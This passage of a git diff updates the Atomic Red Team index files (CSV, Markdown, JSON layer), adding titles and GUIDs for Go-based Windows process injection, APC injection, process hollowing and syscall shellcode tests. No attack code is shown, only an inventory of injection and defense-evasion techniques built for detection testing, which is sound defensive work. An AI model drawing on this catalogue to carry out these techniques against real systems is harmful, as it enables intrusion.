Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 6b1a398d..ad9648b7 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -171,6 +171,13 @@ defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via
 defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 defense-evasion,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 defense-evasion,T1055,Process Injection,5,Read-Write-Execute process Injection,0128e48e-8c1a-433a-a11a-a5387384f1e1,powershell
+defense-evasion,T1055,Process Injection,6,Process Injection with Go using UuidFromStringA WinAPI,2315ce15-38b6-46ac-a3eb-5e21abef2545,powershell
+defense-evasion,T1055,Process Injection,7,Process Injection with Go using EtwpCreateEtwThread WinAPI,7362ecef-6461-402e-8716-7410e1566400,powershell
+defense-evasion,T1055,Process Injection,8,Remote Process Injection with Go using RtlCreateUserThread WinAPI,a0c1725f-abcd-40d6-baac-020f3cf94ecd,powershell
+defense-evasion,T1055,Process Injection,9,Remote Process Injection with Go using CreateRemoteThread WinAPI,69534efc-d5f5-4550-89e6-12c6457b9edd,powershell
+defense-evasion,T1055,Process Injection,10,Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively),2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39,powershell
+defense-evasion,T1055,Process Injection,11,Process Injection with Go using CreateThread WinAPI,2871ed59-3837-4a52-9107-99500ebc87cb,powershell
+defense-evasion,T1055,Process Injection,12,Process Injection with Go using CreateThread WinAPI (Natively),2a3c7035-d14f-467a-af94-933e49fe6786,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
@@ -335,6 +342,8 @@ defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W3
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
 defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
+defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
+defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
 defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
@@ -438,6 +447,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,48,Tamper wit
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper with Windows Defender Registry - Powershell,a72cfef8-d252-48b3-b292-635d332625c3,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
+defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
+defense-evasion,T1055.012,Process Injection: Process Hollowing,4,Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012),94903cc5-d462-498a-b919-b1e5ab155fee,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
 defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
@@ -641,6 +652,13 @@ privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS
 privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 privilege-escalation,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 privilege-escalation,T1055,Process Injection,5,Read-Write-Execute process Injection,0128e48e-8c1a-433a-a11a-a5387384f1e1,powershell
+privilege-escalation,T1055,Process Injection,6,Process Injection with Go using UuidFromStringA WinAPI,2315ce15-38b6-46ac-a3eb-5e21abef2545,powershell
+privilege-escalation,T1055,Process Injection,7,Process Injection with Go using EtwpCreateEtwThread WinAPI,7362ecef-6461-402e-8716-7410e1566400,powershell
+privilege-escalation,T1055,Process Injection,8,Remote Process Injection with Go using RtlCreateUserThread WinAPI,a0c1725f-abcd-40d6-baac-020f3cf94ecd,powershell
+privilege-escalation,T1055,Process Injection,9,Remote Process Injection with Go using CreateRemoteThread WinAPI,69534efc-d5f5-4550-89e6-12c6457b9edd,powershell
+privilege-escalation,T1055,Process Injection,10,Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively),2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39,powershell
+privilege-escalation,T1055,Process Injection,11,Process Injection with Go using CreateThread WinAPI,2871ed59-3837-4a52-9107-99500ebc87cb,powershell
+privilege-escalation,T1055,Process Injection,12,Process Injection with Go using CreateThread WinAPI (Natively),2a3c7035-d14f-467a-af94-933e49fe6786,powershell
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
 privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
@@ -688,6 +706,8 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
+privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
+privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
 privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 privilege-escalation,T1055.002,Process Injection: Portable Executable Injection,1,Portable Executable Injection,578025d5-faa9-4f6d-8390-aae739d503e1,powershell
 privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
@@ -752,6 +772,8 @@ privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a use
 privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
+privilege-escalation,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
+privilege-escalation,T1055.012,Process Injection: Process Hollowing,4,Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012),94903cc5-d462-498a-b919-b1e5ab155fee,powershell
 privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
@@ -860,6 +882,7 @@ execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d
 execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
 execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
+execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
 execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
 execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
 execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index efa3a9cf..7140884b 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -95,6 +95,13 @@ defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via
 defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 defense-evasion,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 defense-evasion,T1055,Process Injection,5,Read-Write-Execute process Injection,0128e48e-8c1a-433a-a11a-a5387384f1e1,powershell
+defense-evasion,T1055,Process Injection,6,Process Injection with Go using UuidFromStringA WinAPI,2315ce15-38b6-46ac-a3eb-5e21abef2545,powershell
+defense-evasion,T1055,Process Injection,7,Process Injection with Go using EtwpCreateEtwThread WinAPI,7362ecef-6461-402e-8716-7410e1566400,powershell
+defense-evasion,T1055,Process Injection,8,Remote Process Injection with Go using RtlCreateUserThread WinAPI,a0c1725f-abcd-40d6-baac-020f3cf94ecd,powershell
+defense-evasion,T1055,Process Injection,9,Remote Process Injection with Go using CreateRemoteThread WinAPI,69534efc-d5f5-4550-89e6-12c6457b9edd,powershell
+defense-evasion,T1055,Process Injection,10,Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively),2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39,powershell
+defense-evasion,T1055,Process Injection,11,Process Injection with Go using CreateThread WinAPI,2871ed59-3837-4a52-9107-99500ebc87cb,powershell
+defense-evasion,T1055,Process Injection,12,Process Injection with Go using CreateThread WinAPI (Natively),2a3c7035-d14f-467a-af94-933e49fe6786,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
@@ -219,6 +226,8 @@ defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
+defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
+defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
@@ -290,6 +299,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,48,Tamper wit
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper with Windows Defender Registry - Powershell,a72cfef8-d252-48b3-b292-635d332625c3,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
+defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
+defense-evasion,T1055.012,Process Injection: Process Hollowing,4,Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012),94903cc5-d462-498a-b919-b1e5ab155fee,powershell
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
 defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
@@ -431,6 +442,13 @@ privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS
 privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 privilege-escalation,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 privilege-escalation,T1055,Process Injection,5,Read-Write-Execute process Injection,0128e48e-8c1a-433a-a11a-a5387384f1e1,powershell
+privilege-escalation,T1055,Process Injection,6,Process Injection with Go using UuidFromStringA WinAPI,2315ce15-38b6-46ac-a3eb-5e21abef2545,powershell
+privilege-escalation,T1055,Process Injection,7,Process Injection with Go using EtwpCreateEtwThread WinAPI,7362ecef-6461-402e-8716-7410e1566400,powershell
+privilege-escalation,T1055,Process Injection,8,Remote Process Injection with Go using RtlCreateUserThread WinAPI,a0c1725f-abcd-40d6-baac-020f3cf94ecd,powershell
+privilege-escalation,T1055,Process Injection,9,Remote Process Injection with Go using CreateRemoteThread WinAPI,69534efc-d5f5-4550-89e6-12c6457b9edd,powershell
+privilege-escalation,T1055,Process Injection,10,Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively),2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39,powershell
+privilege-escalation,T1055,Process Injection,11,Process Injection with Go using CreateThread WinAPI,2871ed59-3837-4a52-9107-99500ebc87cb,powershell
+privilege-escalation,T1055,Process Injection,12,Process Injection with Go using CreateThread WinAPI (Natively),2a3c7035-d14f-467a-af94-933e49fe6786,powershell
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
 privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
@@ -456,6 +474,8 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
+privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
+privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
 privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 privilege-escalation,T1055.002,Process Injection: Portable Executable Injection,1,Portable Executable Injection,578025d5-faa9-4f6d-8390-aae739d503e1,powershell
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
@@ -500,6 +520,8 @@ privilege-escalation,T1098,Account Manipulation,15,Domain Password Policy Check:
 privilege-escalation,T1098,Account Manipulation,16,Domain Password Policy Check: Common Password Use,81959d03-c51f-49a1-bb24-23f1ec885578,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
+privilege-escalation,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
+privilege-escalation,T1055.012,Process Injection: Process Hollowing,4,Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012),94903cc5-d462-498a-b919-b1e5ab155fee,powershell
 privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
@@ -568,6 +590,7 @@ execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d
 execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
 execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
+execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
 execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 2f6c5fef..177f06f1 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -221,6 +221,13 @@
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
   - Atomic Test #5: Read-Write-Execute process Injection [windows]
+  - Atomic Test #6: Process Injection with Go using UuidFromStringA WinAPI [windows]
+  - Atomic Test #7: Process Injection with Go using EtwpCreateEtwThread WinAPI [windows]
+  - Atomic Test #8: Remote Process Injection with Go using RtlCreateUserThread WinAPI [windows]
+  - Atomic Test #9: Remote Process Injection with Go using CreateRemoteThread WinAPI [windows]
+  - Atomic Test #10: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively) [windows]
+  - Atomic Test #11: Process Injection with Go using CreateThread WinAPI [windows]
+  - Atomic Test #12: Process Injection with Go using CreateThread WinAPI (Natively) [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
   - Atomic Test #1: mavinject - Inject DLL into running process [windows]
@@ -428,6 +435,8 @@
   - Atomic Test #3: linux rename /proc/pid/comm using prctl [linux]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
+  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
+  - Atomic Test #3: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI [windows]
 - [T1647 Plist File Modification](../../T1647/T1647.md)
   - Atomic Test #1: Plist Modification [macos]
 - [T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
@@ -563,6 +572,8 @@
 - [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
   - Atomic Test #1: Process Hollowing using PowerShell [windows]
   - Atomic Test #2: RunPE via VBA [windows]
+  - Atomic Test #3: Process Hollowing in Go using CreateProcessW WinAPI [windows]
+  - Atomic Test #4: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012) [windows]
 - T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
   - Atomic Test #1: Decode base64 Data into Script [macos, linux]
@@ -861,6 +872,13 @@
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
   - Atomic Test #5: Read-Write-Execute process Injection [windows]
+  - Atomic Test #6: Process Injection with Go using UuidFromStringA WinAPI [windows]
+  - Atomic Test #7: Process Injection with Go using EtwpCreateEtwThread WinAPI [windows]
+  - Atomic Test #8: Remote Process Injection with Go using RtlCreateUserThread WinAPI [windows]
+  - Atomic Test #9: Remote Process Injection with Go using CreateRemoteThread WinAPI [windows]
+  - Atomic Test #10: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively) [windows]
+  - Atomic Test #11: Process Injection with Go using CreateThread WinAPI [windows]
+  - Atomic Test #12: Process Injection with Go using CreateThread WinAPI (Natively) [windows]
 - [T1611 Escape to Host](../../T1611/T1611.md)
   - Atomic Test #1: Deploy container using nsenter container escape [containers]
   - Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
@@ -929,6 +947,8 @@
   - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
+  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
+  - Atomic Test #3: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI [windows]
 - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
   - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1014,6 +1034,8 @@
 - [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
   - Atomic Test #1: Process Hollowing using PowerShell [windows]
   - Atomic Test #2: RunPE via VBA [windows]
+  - Atomic Test #3: Process Hollowing in Go using CreateProcessW WinAPI [windows]
+  - Atomic Test #4: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012) [windows]
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546 Event Triggered Execution](../../T1546/T1546.md)
   - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
